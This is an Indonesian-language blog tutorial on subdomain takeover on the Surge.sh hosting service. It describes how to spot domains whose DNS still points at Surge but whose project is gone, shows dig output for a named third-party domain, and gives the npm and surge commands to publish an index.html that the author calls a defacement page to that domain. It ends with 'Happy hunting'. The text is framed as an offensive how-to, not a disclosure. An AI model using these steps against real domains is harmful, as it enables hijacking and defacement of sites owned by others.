Surge.sh Custom Domain or Subdomain Takeover – Sejauh ini melakukan takeover domain di Surge adalah yang paling mudah. Bukan bermaksud meremehkan, namun proses yang harus dilalui sangat simpel.
Yang harus Diperiapkan
- OS Linux – bebas mau di lokal atau di vps.
- Nodejs – install nodejs
Vuln
Berikut ciri-ciri situs yang bisa ditakeover
Error:
project not found
Dan syarat domain bisa ditakeover adalah :
- CNAME mengarah ke na-west1.surge.sh
atau
- A Record mengarah ke 45.55.110.124
Kalau salahsatu syaratnya terpenuhi, maka bisa kita takeover. Contoh:
dig agilesysadmin.com ; <<>> DiG 9.10.3-P4-Ubuntu <<>> agilesysadmin.com ;; global options: +cmd ....... ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;agilesysadmin.com. IN A ;; ANSWER SECTION: agilesysadmin.com. 3599 IN A 45.55.110.124 ...........
How to Takeover
Pastikan kalian sudah install Nodejs. Sekarang install Surge via npm.
sudo npm install --global surge
Sekarang kita buat direktori untuk file Surge. Karena kita hanya akan men-takeover domain jadi cukup upload saja index.html dengan script defacement page.
mkdir surge cd surge nano index.html
Sekarang kita run surge dengan perintah
surge path_project namadomain.
Contoh
surge /home/linuxsec/surge/ agilesysadmin.com
Contoh jika berhasil.
Lalu sekarang coba cek domain yang berhasil kita takeover.
Oke sekian tutorial kali ini. Happy hunting.
